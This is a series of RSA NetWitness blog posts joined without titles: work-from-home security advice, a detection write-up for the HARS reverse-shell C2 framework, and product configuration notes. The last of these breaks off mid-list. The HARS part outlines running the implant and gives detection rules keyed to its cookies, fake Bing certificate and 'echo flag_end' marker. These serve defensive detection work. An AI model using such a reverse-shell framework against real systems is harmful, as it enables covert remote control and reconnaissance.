
The ability to capture network events while keeping only the header portion and truncating the payload has been available for quite some time. This has always been a great option when the lack of analytical value of the raw data (e.g. the session payload) does not justify paying for the storage cost incurred to keep it. Typical examples include database backup transfers, or encrypted data that you are unable to decrypt into clear text.

 

In RSA NetWitness Platform 11.1 we added additional options that increase the flexibility of when truncation is applied to an event.

 

  • The first new option allows the headers, along with any Secure Sockets Layer (SSL) certificate exchange, to be captured before the remaining portion of the payload is truncated. This allows analysis such as TLS certificate hashing and JA3/JA3S fingerprint generation while still removing the rest of the payload to save on storage space.
  • The second option allows the administrator to choose a custom boundary, expressed as a number of bytes into the event's raw data, at which the payload is truncated. Any bytes before the boundary are saved as part of the event; anything after the boundary is not stored.

 

The administrative interface shown below is where an admin can modify the truncation options on application rules per network decoder.

 

Administration of network decoder application rule truncation options

1       Introduction

The efforts of people around the globe have suddenly forced many workers to stay at home. For a significant portion of these workers, that also means working remotely either for the first time, or at least more often than their normal telecommuting schedule. As a result of this necessity, many organizations may be forced to implement new remote technologies or significantly expand their current capacity for remote users. This added capability can present a significant security risk if not implemented correctly. Furthermore, malicious actors never pass up the opportunity to capitalize on current affairs. The RSA Incident Response Team has years of experience responding to Targeted Attacks and Advanced Threat Actors while assisting our clients with improving their overall security posture. The members of our team are either working with our customers on-site or supporting them from home. Our team has frequently assisted clients remotely, providing us with extensive experience in operating a secure remote team. Given the increasing threat landscape, we are sharing some essential tips and suggestions on how organizations can improve their security posture, as well as how their remote workforce can keep themselves secure by following some best practices.

2       Tips for Users that are Working from Home

During this time many workers will be shifting from the office life to a work from home life that is unfamiliar to most of them. Many workers will be experiencing this reality for the first time, while for others it will be the first time this has been an everyday occurrence. In addition to the recommendations provided on the RSA blog (https://www.rsa.com/en-us/blog/2020-03/cyber-resiliency-begins-at-home), the RSA IR team is providing some additional details and best practices that users can utilize to help keep themselves secure while working from home.  Additionally, the RSA IR team has published a blog with tips that organizations can use to help improve their security posture (RSA IR - Best Practices for Organizations (A Starting Point)).

2.1      Use Provided Corporate Hardware

Now that you have shifted to working from home, you still need to ensure that all work-related tasks are completed using your organization's provided laptop, if available. Using the work laptop means the user remains covered by the organization's security protections. It also helps the user avoid the accidental disclosure of sensitive work data that can occur when that information is stored on a personally owned machine. Some organizations have a bring-your-own-device (BYOD) policy.  In those cases, RSA recommends following your company's normal policy for remote computing.

2.2      Passwords

The passwords used for all corporate logins should comply with your organization's password policy.  However, RSA recommends the use of a password manager to increase your security. Password managers (such as LastPass, Password Safe, Dashlane, 1Password, and Apple Keychain, among other reputable options) allow you to randomly generate a secure and unique password for each login and store them within a database. This allows you to comply with corporate security policies without having to remember each individual password (or worse, reusing the same password). The implication of reusing passwords is that if an account's password is compromised in one location, then every other account that uses the same password is also compromised.  We will also be discussing multi factor authentication next; suffice it to say that we recommend enabling multi factor authentication for access to your password manager for increased security.

Several password managers can be found at the below link:

NOTE: Password managers require users to remember a single master password in order to access all the others. It should be complex and not easily guessable. We recommend that you adopt the concept of passphrases rather than passwords. A passphrase can be a sentence or a combination of words that has some meaning to you. For example, a passphrase could be: “I need to be on vacation now!” or “Correct Horse Battery Staple” (reference: xkcd: Password Strength). One example of a passphrase generator is https://xkpasswd.net/
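If you would rather generate passphrases locally than use a website, the idea is simple enough to sketch in a few lines of Python. This is a minimal illustration only; the short word list below is made up, and a real generator should draw from a large, well-known list such as the EFF diceware words:

import secrets

# Illustrative word list only; use a large, well-known list (e.g. EFF diceware) in practice.
WORDS = ["correct", "horse", "battery", "staple", "vacation", "window", "coffee", "river"]

def make_passphrase(n_words: int = 4, separator: str = " ") -> str:
    """Join n_words chosen with a cryptographically secure RNG."""
    return separator.join(secrets.choice(WORDS) for _ in range(n_words))

print(make_passphrase())  # e.g. "river coffee staple window"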

2.2.1    Default Passwords

Many devices require a username and password to log in for initial or further configuration.  Often these devices (such as home routers, Wi-Fi access points, cable modems, and other Internet devices) come equipped with default passwords (such as “admin” or “password”).  RSA recommends that all default passwords be changed to secure, unique passwords, especially for devices that connect directly to the Internet.

2.3        Multi Factor Authentication (Also Known as Two Factor Authentication)

Using multi factor authentication (MFA) for all remote access, for systems hosting sensitive data, and for systems performing administrative functions within the organization is strongly recommended. Multi factor authentication, which is an evolution of two factor authentication (2FA), enhances security by requiring that a user present multiple pieces of information to authenticate themselves. Credentials typically fall into one of three categories: something you know (like a password or PIN), something you have (like a smart card or token), or something you are (like a fingerprint or iris scan). Credentials must come from two different categories in order to be classified as multi-factor. Applications that are sensitive to the organization, such as your password manager, customer databases, and administrative tools, should all have multi factor authentication enabled.
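As a concrete illustration of the “something you have” factor, many software tokens implement time-based one-time passwords (TOTP, RFC 6238). Here is a minimal sketch using the third-party pyotp library; the secret is randomly generated purely for illustration, whereas in practice it is provisioned when the token is enrolled:

import pyotp

# Shared secret established at enrollment time (randomly generated here for illustration).
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

code = totp.now()           # six-digit code that rotates every 30 seconds
print(code)
print(totp.verify(code))    # the server-side check; True while the code is still current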

 

2.4      Follow Your Company's IT and Security Policies

Organizations have established IT and security policies to protect all employees as well as the organization itself.  Working outside the office does not mean these policies no longer apply. Security policies covering the way you handle data, communications, installed applications, and what you can do on your laptop should all be followed. Company-provided computers should not be treated the same as personal devices; this may include not allowing your family to use the company-provided computer.

2.5      Allow Updates and Patching to Take Place

If your organization has a patch management program in place, users should allow these processes to function as they normally would in the office. These update procedures will at times require a reboot, so ensure your machine is online, connected to the corporate VPN (if available), and allowed to reboot when it asks. Do not skip patches released by your organization's IT department; skipping them puts your machine at risk of being compromised.

2.5.1    Update Personal Devices

In addition to allowing your corporate system to update, personal assets should be updated as well. It is easy to ignore security updates for your systems, devices, or applications by simply clicking “update later”. However, repeatedly delaying these updates can lead to serious vulnerability issues. Updates should be performed for your personal operating systems (such as Windows or macOS), web browsers (such as Chrome, Firefox, Internet Explorer or Edge), tablets (such as iPad, Kindle, or Android), smartphones (such as iPhone or Android), and any other device that requires updates.

2.6      Phishing / Scams / Link Safety

Phishing is an attempt to trick a user into believing that an email message is something that they need, want, or are interested in. Phishing scams typically revolve around current world events or common life events (such as shipping notifications for online orders, among others). The attackers know that the subject and content of the email will trigger either fear or intrigue in the recipient, and that emotion makes the recipient more likely to click a link within the email or open its attachment. The link will likely download a malicious application or present the user with a fake login page that attempts to harvest credentials for sites such as your bank, email, social media, online shopping, or gaming accounts.  This can result in the loss of access to, fraud against, or abuse of these accounts if the user divulges this information.

If you are unfamiliar with what phishing looks like or some of the common tactics used for social engineering, we highly recommend taking the quiz linked below to improve your skills for spotting phishing attempts:

2.7      Wi-Fi Security

RSA recommends encrypting home wireless networks with Wi-Fi Protected Access (WPA). There are several versions (WPA, WPA2 & WPA3), with WPA3 being the strongest currently available. RSA does not recommend using Wired Equivalent Privacy (WEP) or unsecured wireless networks.

2.8      Security Training

If your company offers security training, RSA recommends that you take (or retake if it has been a while) the offered training as you are potentially at a higher risk now that you are outside the office. We understand that these trainings are not always the most exciting learning experiences, however they do help to reinforce good security behavior and can act as a refresher for things you may already know. One good resource to start is the SANS Security Awareness Work-from-Home Kit (https://www.sans.org/security-awareness-training/sans-security-awareness-work-home-deployment-kit)

2.9      Improve Your Household's Internet Safety

All the devices on your local network are linked to each other in one way or another. It is therefore important to ensure that all members of your household stay safe online and do not infect you by proxy. A great way of helping ensure your family's safety on the internet is by using Microsoft Family:

2.10  Non-Security Tips for Working from Home

2.10.1  A Second Monitor

A second monitor can increase your productivity, improve workflow and generally provide an improved experience while working.  Many organizations are offering to let employees borrow work resources such as monitors for use during this period of working from home. Check if your company is providing something similar.

2.10.2  A Comfortable and Supportive Chair

Since you will no doubt be spending an increased amount of time in front of your computer working, you will also likely be spending an increased amount of time in your chair.  Having a comfortable and supportive chair can help with posture and ergonomics while working from home.

2.10.3  Consider a Standing Desk or Standing Desk Converter

For many people, sitting all day is not ideal. To help combat this, consider using a standing desk or a standing desk converter that lets you decide whether to sit or stand at will. If you’re not able to use a standing desk, be sure to take breaks where you can stand up and stretch.

3      Conclusion

In these uncertain times, we hope that this advice will help organizations and users stay connected and stay secure. Watch out for more posts and advice from across the RSA organization, and let us know what you're doing in the comments below.

1       Introduction

The efforts of people around the globe have suddenly forced many workers to stay at home. For a significant portion of these workers, that also means working remotely either for the first time, or at least more often than their normal telecommuting schedule. As a result of this necessity, many organizations may be forced to implement new remote technologies or significantly expand their current capacity for remote users. This added capability can present a significant security risk if not implemented correctly. Furthermore, malicious actors never pass up the opportunity to capitalize on current affairs. The RSA Incident Response Team has years of experience responding to Targeted Attacks and Advanced Threat Actors while assisting our clients with improving their overall security posture. The members of our team are either working with our customers on-site or supporting them from home. Our team has frequently assisted clients remotely, providing us with extensive experience in operating a secure remote team. Given the increasing threat landscape, we are sharing some essential tips and suggestions on how organizations can improve their security posture, as well as how their remote workforce can keep themselves secure by following some best practices.

2       Tips for Organizations (A Starting Point)

While there are many steps organizations can take to better protect themselves and their users, the RSA IR team is sharing some essential tips and suggestions that we consider a good starting point. This is by no means a complete list.  Each organization should adjust the recommendations below according to its security posture, risk profile, and risk acceptance.

Many vendors are offering emergency capacity extensions or trials of their products in this time of unprecedented social change.  Check with your vendors to see if they have any such offers in place for technology that your organization has not already implemented, as it pertains to the recommendations listed below. For a strategic approach, take a look at the post from our colleagues on the Advanced Cyber Defense (ACD) team, Work From Home - The Paradigm Shift in Cyber Defense.

2.1      What Organizations Can Do for Their Users

2.1.1    VPN

While it may be tempting and seem like an easy option to just make resources available online via services like RDP, this is generally not recommended. Threat actors love searching for vulnerable servers that are connected to the internet regardless of the port used. Search engines like Shodan are showing an increase in the number of servers exposing RDP directly to the internet (https://blog.shodan.io/trends-in-internet-exposure/ ). Open RDP servers are regularly used to infect organizations with Ransomware and other malware (Two weeks after Microsoft warned of Windows RDP worms, a million internet-facing boxes still vulnerable • The Register ). RSA strongly discourages organizations from exposing RDP services directly to the internet.

Organizations should utilize VPN (or VPN alternative) technologies for employee remote access. RSA IR has the following tips regarding VPN usage.

  • Ensure Licensing counts can support the increased number of remote workers.
  • Ensure that the VPN devices can handle the increased number of simultaneous connections and throughput.
  • For strong security, RSA recommends that the VPN be Always-On if possible. An Always-On VPN requires the system to be connected to the VPN whenever an authorized client is connected to the internet. If bandwidth, simultaneous connection count, or bring-your-own-device (BYOD) is of concern, this suggestion can be re-prioritized.
  • All traffic should be tunneled over the VPN (No Split Tunneling), thus enabling the same network visibility and controls as if users were in office. If bandwidth availability or bring-your-own-device (BYOD) is of concern to the organization, this recommendation can be re-prioritized.
  • Investigate VPN alternatives for certain users. Alternative remote access solutions also exist, such as Virtual Desktop Infrastructure (VDI), cloud infrastructure, Software as a Service (SaaS), and others.

2.1.2    Multi Factor Authentication (Also Known as Two Factor Authentication) For All Remote Access

All remote access (including VPN, VDI, Cloud, Office365, SaaS, etc.) should be required to utilize Multi Factor Authentication. Multi Factor Authentication, which is an evolution of Two Factor Authentication (2FA), enhances security by requiring that a user present multiple pieces of information for authentication. Credentials typically fall into one of three categories: something you know (like a password or PIN), something you have (like a smart card or token), or something you are (like your fingerprint). Credentials must come from two different categories in order to be classified as multi-factor. As mentioned, check with your vendors to see if they are offering any assistance with surge capacity or new solutions.

2.1.3    User Education

RSA generally recommends that all staff using computer resources within a company complete annual security training. However, during this time when more users are working remotely, RSA recommends that organizations hold a special organization-wide user education session on password safety, phishing attacks, IT security policies, as well as covering how to report issues to the IT and Security Teams. If you’re looking for a place to start, see our other blog post for tips for users that are working from home (RSA IR - Recommendations for Users Working from Home).

2.2      What Organizations Can Do for Themselves

2.2.1    Updates and Patching

RSA consistently finds out-of-date and out-of-support operating systems and software running in client environments. Older software often has publicly known vulnerabilities and exploits that are freely available online and is targeted by commodity malware as well as targeted attackers. RSA strongly recommends that any core software be aggressively updated on a regular basis, especially if a vulnerability for a particular application is publicly announced. Exploiting vulnerable software is one of the easiest ways for an attacker to find their way into the enterprise. At a minimum, organizations should look to:

  • Update and Patch all external facing systems, servers and applications (including web applications or frameworks).
  • Update and Patch all Critical Systems internal or external.

2.2.2    Web Application Firewall

If not already deployed, RSA recommends implementing a Web Application Firewall (WAF) to better protect Internet facing web applications. A WAF solution can provide a reduction in the attack surface of web applications and in some cases, of the operating system itself. It is important to note that simply installing a WAF solution will not immediately secure all the web applications as all WAF solutions, regardless of vendor, need to be tuned for the specific applications and environments they are being used to protect.

If a WAF is already deployed, RSA recommends that organizations verify that it is in front of not just the business-critical web applications, but also all other external web-facing assets.

2.2.3    Leverage Freely Available Threat Intelligence Feeds

As notices have been released about increased attacker activity related to recent attacks and fraud (https://www.ic3.gov/media/2020/200320.aspx), many threat intelligence vendors are offering free intelligence on current threats and scams. Here are some of the companies offering related intelligence feeds for free, as well as some additional tools for analysts.

2.2.4    Endpoint Detection and Response (EDR)

Endpoint Detection and Response (EDR) is especially important to organizations that, for various reasons, are unable to enable an Always-On VPN. 

If your organization already has an Endpoint Detection and Response (EDR) solution, ensure that it is deployed to all remote users.  Since endpoints may not be sending all their traffic internally to allow for network visibility, EDR tools can help gain visibility of endpoints operating outside the internal network environment. Organizations need to ensure that data collected by the EDR tool can be transmitted to the central EDR server either continuously or while connected to the VPN. Organizations must also ensure that their licensing limits, as well as server capacity, support a potential increase in the number of endpoints.  Speak to your security vendors to see if they provide surge or Business Continuity increases during this time.

If your organization does not currently have an EDR tool, then consider deploying one.  EDR solutions now offer more than just detection and blacklisting of malware; they also have built-in forensic capabilities such as acquiring remote system files, memory images, behavior analysis, and false positive management via whitelisting. This means that organizations can detect, respond to, and block malicious activity much more quickly and without the need to create a full host forensic image for investigation. Additionally, once a Behavior of Compromise (BOC) is identified, the EDR solution should be able to detect where else in the enterprise that indicator has been observed. Speak to your trusted security vendors and see if they are offering any on a trial basis.

2.2.5    Remote Collaboration

If your organization does not already have a policy for remote collaboration tools (such as screen share), consider adopting one for remote users. At the very least, RSA suggests having a recommendation for users so that they do not seek out their own solutions.  Some examples include Zoom, WebEx, GoToMeeting, Microsoft Teams, as well as others.

3      Conclusion

In these uncertain times, we hope that this advice will help organizations and users stay connected and stay secure. Watch out for more posts and advice from across the RSA organization, and let us know what you're doing in the comments below.

I have recently been posting a number of blogs regarding the usage of the RSA NetWitness Platform to detect attackers within your environment. As the list of blogs grows, it is becoming increasingly difficult to navigate through them easily. To combat this, this blog post contains references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.

 

 

 

 

 

 

 

Special thanks to Rui Ataide for his support and guidance for these posts.

I recently reviewed HTTP Asynchronous Reverse Shell (HARS) for The C2 Matrix, which should be posted soon! They also have a Google Docs spreadsheet here: C2Matrix - Google Sheets. I’ve been following them for a while and have tried to map as many of the frameworks as possible from a defensive perspective. This blog post will therefore cover just that: how to use RSA NetWitness to detect HARS.

 

The Attack

After editing the configuration files, we can compile the executable to run on the victim endpoint. After executing the binary, we get the default error message, which is configurable, but we left it at the default settings:

 

The error message is a ruse and the connection is still made back to the C2 server where we see the successful connection from our victim endpoint:

 

It drops us by default into a prompt where we can begin to execute our commands, such as whoami, quser, etc.:

 

Detection Using NetWitness Network

By default HARS uses SSL, so to see the underlying HTTP traffic, we used a MITM proxy to intercept the communication; it is highly advisable to introduce SSL interception into your own environment. Later in this post, we will also cover the anomalies in the communication over SSL.

 

HTTP

An interesting meta value generated for the HARS traffic is http invalid cookie; this meta value is generated for HTTP cookies that do not follow RFC 6265:

 

Drilling into the Events view for these sessions before reconstructing them, we can observe a beacon-type pattern to the connections with some jitter, as well as a low variance in the payload for each request; this indicates a more mechanical, check-in type of behaviour:

 

Reconstructing the events and looking at the cookie for the requests, we can see what looks like Base64 data:

 

 

Using the built-in Base64 decoding, we can see that this decodes to HELLO. While this is not in itself indicative of malicious activity, it is still a malformed cookie with a rather strange value:

 

From here, we can continue to go through the traffic and decode the values supplied within the cookie header. The next few cookies contain the text QVNL, which returns ASK when Base64 decoded:
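Outside of the NetWitness UI, the same decodes can be confirmed with a few lines of Python; the two values below are the cookie strings observed in this traffic:

import base64

# Cookie values observed in the HARS check-in traffic.
for value in ("SEVMTE8=", "QVNL"):
    padded = value + "=" * (-len(value) % 4)   # pad to a multiple of 4 characters if needed
    print(value, "->", base64.b64decode(padded).decode())
# SEVMTE8= -> HELLO
# QVNL -> ASK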

 

Eventually we come across a cookie with a Base64 encoded version of what looks like the output from a whoami command:

 

As well as one that contains the output from a quser command. Both of these look rather suspicious; this is information that normally should not be sent to a remote host, especially in this manner as a cookie value:

 

Looking at the request prior to the one that returns the output of quser, and sifting through the payload, there is a Base64 encoded quser command within it:

 

This C2 framework disguises its commands within legitimate looking pages in an attempt to evade detection by analysts, but is easily detected with NetWitness using a single meta value, http invalid cookie.

NOTE: It is important to remember that many applications abuse the HTTP protocol and do not follow RFCs. It is therefore possible for legitimate traffic to have invalid cookies, and it is down to the defender to determine whether the activity is malicious or not; NetWitness, however, points you to these anomalies and makes it easier to focus on traffic of interest.

 

This C2 is highly malleable, so the following application rule would only pick up its default configuration. However, attackers tend to be lazy and often leave many of the default settings for these tools in place, which lets us easily create an application rule to detect this behaviour:

cookie = 'QVNL','SEVMTE8='

 

In order for the application rule to work, you would need to register the cookie HTTP header. This involves using the customHeaders() function within the HTTP_lua_options file as described on the community:

 

One of our previous posts also covered registering the cookie HTTP header into a meta key and can be found on the community:

 

 

SSL

As previously stated, HARS uses SSL to communicate by default. When HARS initially connects back to the C2 from the victim endpoint, it attempts to blend in with typical traffic to www[.]bing[.]com. The below screenshot shows the malicious traffic (on the left), and the legitimate traffic to Bing (on the right). Playing spot the difference, we can see a few anomalies as highlighted below:

 

This allows us to create logic to detect possible HARS usage with the following application rule:

service = 443 && alias.host='www.bing.com' && ssl.ca='microsoft corporation' && ssl.subject='microsoft corporation'

 

We can also create an application rule to look for anomalous Bing certificates. This would be lower fidelity, but it detects a broader range of suspicious cases to aid in threat hunting:

service = 443 && alias.host = 'www.bing.com' && not(alias.host='www.bing.com' && ssl.ca='microsoft corporation','baltimore' && ssl.subject='www.bing.com')

 

Detection Using NetWitness Endpoint

HARS uses PowerShell to execute the commands on the victim endpoint, but does not use any form of obfuscation. Therefore, in NetWitness Endpoint we can see multiple hits under the Behaviours of Compromise meta key for the reconnaissance commands executed: quser, whoami, and tasklist:

 

Drilling into those meta values, we can see an executable named hars.exe running out of a suspect directory and executing reconnaissance-type commands:

 

Pivoting on the filename hars.exe (filename.src = 'hars.exe'), which really could be any other name but would still be launching the commands, we can see all the events from this suspect executable, such as the commands it executed under the Source Parameter meta key:

 

After every command it executes, HARS appends the following: echo flag_end. We can use this to our advantage to create an application rule that detects its behaviour:

category = 'console event' && param.src ends 'echo flag_end'

 

Another neat indicator comes under the Context meta key. Here we can see four interesting meta values associated with hars.exe: console.remote, network.ipv4, network.nonroutable, and network.outgoing. These meta values tell us that this executable is making an outbound network connection and running console commands:

 

Drilling into the Events view for the network meta values, we can see where the executable is connecting to:

 

And drilling into the console.remote meta value, we can see the commands that were executed:

 

So from a defender's perspective, it could be a good idea to use the filter context = 'console.remote' and look for suspicious executables:

 

Conclusion

Not all C2 frameworks use advanced methods of obfuscation or encryption; some rely on confusing analysts by trying to blend in with normal traffic and mimicking legitimate web sites. It is important as a defender to spot these anomalies and fully analyse the traffic, even if at first glance it appears to be normal. And remember: the attacker probably assumes that none of this really matters, as the attack is over SSL and the data would not be visible to analysts, which is why having SSL interception is a great advantage for analysts; it really catches attackers out.

INTRODUCTION

By now, you may have already started to work from home instead of your usual workplace, like many of your co-workers and peers. As the situation continues to evolve, there is a rapidly increasing trend for organizations to shift their employees from the office to working from home. In addition to the recommendations provided in the following RSA blogs: Cyber Resiliency Begins at Home, RSA IR - Best Practices for Organizations (A Starting Point), and RSA IR - Recommendations for Users Working from Home, in this post we examine the potential challenges that cybersecurity professionals are contending with as organizations around the globe transition more employees from offices to work-from-home arrangements and conduct meetings through virtual means. This transformation in how we work and conduct our businesses will inevitably have an impact on our threat environment. In the following sections we discuss the paradigm shift in our threat landscape and what we should do to continue to stay effective in safeguarding our assets from emerging cyber threats.

 

THE PROBLEM

There are two key problems that we see here, which we break down in the following paragraphs:

 

Problem #1

The cyber defense architecture of many organizations today is designed on the assumption that most daily business-as-usual (BAU) activities are performed on-premise. With the sudden need to allow a large number of employees to work from home, many of these activities now have to be performed remotely. Aside from the challenges of provisioning or scaling the necessary IT infrastructure to support these sudden changes, this also gives rise to a shift in the threat landscape, where the existing cyber defense measures that have worked in the past may no longer be effective.

 

Problem #2

Attackers are increasingly preying on human psychology by crafting new attacks around the latest trending news topics or by specifically targeting work-from-home employees through the remote meeting applications they use, for example:

  • Phishing Emails and Malware Attachments disguised as legitimate meeting invites and installers from popular remote meeting applications.
  • Malicious mobile applications promising to be the most up-to-date outlet for tracking the latest breaking news and developments.
  • Domain names that are similar to popular remote meeting platforms.

 

Combining both of the above-mentioned problems with the tendency that, as humans, we naturally feel more comfortable in our home setting than in the office, there is an increased likelihood that some of us may let our guard down when it comes to spotting phishing emails, malicious attachments and applications, and malicious websites that come knocking at the least expected time. All of this can lead to an exponential increase in the level of cybersecurity risk faced by your organization, and when there is a sudden surge in the number of cybersecurity breaches, does your organization have the capacity to handle them?

 

WHAT CAN YOU DO?

Here, we look at what you can explore as part of the Cybersecurity Team in your organization, from the perspectives of People, Process and Technology, to address the above-mentioned issues.

 

People

Virtual Cyber Awareness Briefings. With increasingly more employees working from home, you can no longer conduct the usual quarterly cyber awareness briefings in traditional classroom settings. Instead of halting these briefings, take them virtual in the form of webinars for all employees who are working remotely. There are many platforms that allow you to do so, such as WebEx, Zoom, Adobe Connect, etc. You can also record the sessions and make them available offline for employees who are not able to join the live sessions.

 

EDMs. Apart from virtual awareness briefings, you should also look to increase the frequency of Electronic Direct Mails (EDMs) to remind employees of the cyber hygiene they should continue to practice even when working from home.

 

Reward-based Quizzes. Besides briefings and EDMs, you can also take one step further to implement regular reward-based quizzes related to different cyber hygiene topics, in order to encourage and engage your employees in an interactive manner.  

 

Phishing Tests. Lastly, the best way to assess whether the above initiatives are effective is to test them by running a phishing campaign against your internal employees. This could include regular phishing tests to assess their alertness in spotting such threats. You should also look to send out such emails in batches and in a random manner across different departments and regions, so that employees are not able to “cheat” the test by sharing information with their peers about ongoing tests.

For the above initiatives, you could potentially include phishing topics that are related to the latest trending news or emails disguised as coming from legitimate remote meeting applications (e.g. meeting invites) in order to mimic the latest threats that the organization is facing.

 

Process

There are a couple of key processes which would require review and revision, to ensure that they are relevant to the work-from-home model. For example: 

 

Access Control. With the increasing number of employees working from home, you need to review the existing access control related processes, such as the requirements for an employee to qualify for remote access. For example, your Access Control List (ACL) for remote access may previously have been role-based, but this may no longer apply if practically all employees across different roles now require remote access. With this sudden growth in remote access employees, are the existing access control provisioning and review processes still practical and relevant? Of course, there are many other issues to consider in this area, which are too long to discuss in this post.

 

Incident Reporting. With the work-from-home model, you need to ensure that all employees working remotely are familiar with the incident reporting mechanisms in the event of any suspicious activity. For example, they need to know the reporting hotline and email address they can reach on a 24/7 basis, as well as other automated reporting mechanisms, such as a tool for reporting phishing emails from within their Outlook application.

 

Cybersecurity Champions. Apart from the regular incident reporting mechanisms, you should also consider appointing representatives across different departments or teams as “Cybersecurity Champions”: regular employees (i.e. not part of the Cybersecurity Team) who are more proficient in the organization's security processes. This initiative allows employees to reach out to someone they are familiar with if they are unsure about any suspicious activity or would like a quick refresher on cyber hygiene best practices.

 

Incident Response (IR). Are your existing IR processes robust enough and tailored to include the remote working model practiced by most of your employees right now? You should look to review your existing processes covering the following phases and ensure that they remain relevant to the latest Business and Operating models of your organization:

  • Triage
  • Investigation
  • Containment
  • Eradication
  • Remediation
  • After Action Review

 

Technology

Access Control. In terms of access control provisioning for remote working, you should consider the best approach to implementing multi-factor authentication in a way that allows you to scale the infrastructure up or down quickly and cost-effectively. The options could include the following, depending on your existing set-up, requirements and budget:

  • Hardware token
  • Software token
  • SMS/ Email OTP

 

For operations on critical servers that need to be performed remotely, there may be a need to differentiate them from the regular 2FA that is provisioned for normal remote access, by having a further step-up in the authentication process.

 

Monitoring and Detection. With the shift to the remote working model, there is a need to put more focus on the SIEM Use Cases related to VPN and remote access so that you can pick up such threats early. These are some examples of the Use Cases that may be relevant to the remote working model:

  • Detecting VPN access from suspicious locations
  • Simultaneous VPN Geo login from a single user (a minimal sketch of this check is shown after the list)
  • Suspicious remote logon hours from critical admin accounts
  • Remote admin session reconnected from a different workstation
  • Mass phishing attempts targeting your organization
  • and many more..
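As an illustration of the simultaneous Geo login use case referenced above, the underlying logic is straightforward. Here is a minimal, hedged sketch in Python; the log format, GeoIP source and one-hour window are all assumptions, and in practice this would be implemented as a correlation rule in your SIEM rather than a script:

from collections import defaultdict
from datetime import datetime, timedelta

# Toy VPN login records: (user, login time, country resolved from the source IP).
# In practice these would come from your VPN/SIEM logs plus a GeoIP lookup.
logins = [
    ("alice", datetime(2020, 3, 30, 9, 0),  "US"),
    ("alice", datetime(2020, 3, 30, 9, 20), "RO"),   # a second country within the window
    ("bob",   datetime(2020, 3, 30, 10, 0), "US"),
]

WINDOW = timedelta(hours=1)

def simultaneous_geo_logins(records, window=WINDOW):
    """Return (user, first country, second country) tuples for logins from
    different countries by the same user within the time window."""
    by_user = defaultdict(list)
    for user, ts, country in records:
        by_user[user].append((ts, country))
    alerts = []
    for user, events in by_user.items():
        events.sort()
        for i, (ts, country) in enumerate(events):
            for later_ts, later_country in events[i + 1:]:
                if later_ts - ts > window:
                    break
                if later_country != country:
                    alerts.append((user, country, later_country))
    return alerts

print(simultaneous_geo_logins(logins))   # [('alice', 'US', 'RO')]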

 

Endpoint. There are many different layers of endpoint controls which become especially important for the work-from-home model, such as the following:

  • Hard Disk Encryption for all PCs, so that corporate data remains protected even if a device is misplaced.
  • Mobile Device Management, which allows the IT department to manage corporate information stored on mobile devices and to securely remove that information remotely if a device is misplaced.
  • Endpoint Detection and Response, to detect advanced threats on your endpoint devices that may not be picked up by traditional anti-malware solutions.
  • Data Labelling Enforcement and Data Loss Prevention (DLP) – enforce data labelling for all documents and emails created or modified, and implement DLP to detect or prevent unauthorized movement of sensitive data.
  • Application Whitelisting, as a second layer of defense against the unauthorized installation of malicious applications masquerading as genuine ones on the corporate PC.

 

Network and Servers. To ensure that you are not opening up the attack surface of your network and assets given the increased number of remote connections, you should consider the following:

  • VPN provisioning for all remote connections.
  • Network Access Control to disallow remote connections from PCs to the corporate network if the Anti-Virus definitions or patching status of the PCs are not up-to-date.
  • Jump Server. Consider placing a Jump Server in front of critical servers to serve as an added layer of defense. This is especially important if the servers are critical but need to be accessed remotely.

 

Email. For corporate email, you could look to implement a phishing email reporting tool with which your employees can easily report a phishing email to the Cybersecurity Team without having to manually write an email or call the reporting hotline. You should also look to implement a labelling mechanism that automatically labels all emails received from external domains as “External”; this has proven effective in raising employees' alertness when they receive external emails, which could potentially be phishing emails or contain malicious artefacts.

 

Threat Intel and Hunting. A common saying goes, “Know thyself and thy adversary to win a hundred battles”; this applies in the realm of Cyber Defense as well. Having timely intel that is relevant to your threat landscape helps you perform sense-making and correlation of threats in your environment more effectively, and allows you to put the necessary measures in place early to look out for such threats. You should also look to conduct regular proactive threat hunting sessions by trained specialists (i.e. Threat Hunters) to discover low-lying and advanced attacks which might otherwise not be picked up by your regular controls.

 

THE NEED FOR SPEED

Given the need to transition your organization to a remote working model quickly, securely and efficiently, you will need to make the relevant changes to your existing Cyber Defense Architecture (in the areas of People, Process and Technology) within a short amount of time, in order to ensure that the level of cybersecurity risk your organization is potentially exposed to remains at an acceptable level. As such, it may be worthwhile to consider engaging external professionals for tasks that can be performed remotely, for example:

  • Perform a gap analysis on your existing processes (e.g. Incident Response and Reporting Processes, Access Provisioning Processes) through documents review and remote workshops that are focused on the remote working model and provide practical recommendations on what you can quickly implement to close the gaps.
  • Develop Use Cases that are tailored to the remote working model to ensure that the detection remains effective against the latest threat landscape.
  • Subscribe to a temporary Managed Security Service to outsource your Level 1 monitoring to an external party if you anticipate a surge in the number of alerts in the SOC during a particular period, so that you can free up the time of your internal SOC team to focus on investigation and incident response.
  • Subscribe to an IR Retainer service to implement a surge resourcing model, ensuring that you have sufficiently trained expert resources when needed most, to assist the internal IR Team in times of complex incidents which may require highly complex work such as malware analysis and digital forensics.
  • Conduct threat hunting sessions to discover any low-lying threats which may have been present for some time in your environment.

 

CONCLUSION

To conclude, there is no one-size-fits-all solution, but we hope that the above provides you with some useful insights for planning your Cyber Defense Architecture.

The NetWitness 11.4 release included a number of features and enhancements for NetWitness Endpoint, one of which was the ability to collect flat file logs (https://community.rsa.com/docs/DOC-110149#Endpoint_Configuration), with the intent that this collection method would allow organizations to replace existing SFTP agents with the Endpoint Agent.

 

Flat file collection via the 11.4 Endpoint agent allows for much easier management compared to the SFTP agent, in addition to the multitude of additional investigative and forensic benefits available with both the free and advanced versions of the Endpoint agent (NetWitness Endpoint User Guide for NetWitness Platform 11.x - Table of Contents).

 

The 11.4 release included a number of supported, out-of-the-box (OOTB) flat file collection sources, with support for additional OOTB as well as custom sources planned for future releases.  However, because I am both impatient and willing to experiment in my lab where there are zero consequences if I break something, I decided to see whether I could port my existing, custom SFTP-based flat file collections to the new 11.4 Endpoint collection.

 

The process ended up being quite simple and easy.  Assuming you already have your Endpoint Server installed and configured, as well as custom flat file typespecs and parsers that you are using, all you need to do is:

  1. install an 11.4+ endpoint agent onto the host(s) that have the flat file logs
  2. ...then copy the custom typespec from the Log Decoder/Log Collector filesystem (/etc/netwitness/ng/logcollection/content/collection/file)
  3. ...to the Node0/Admin Server filesystem (/var/netwitness/source-server/content/collection/file)
    1. ...if your typespec does not already include a <defaults.filePath> element in the XML, go ahead and add one (you can modify the path later in the UI)
    2. ...for example: 
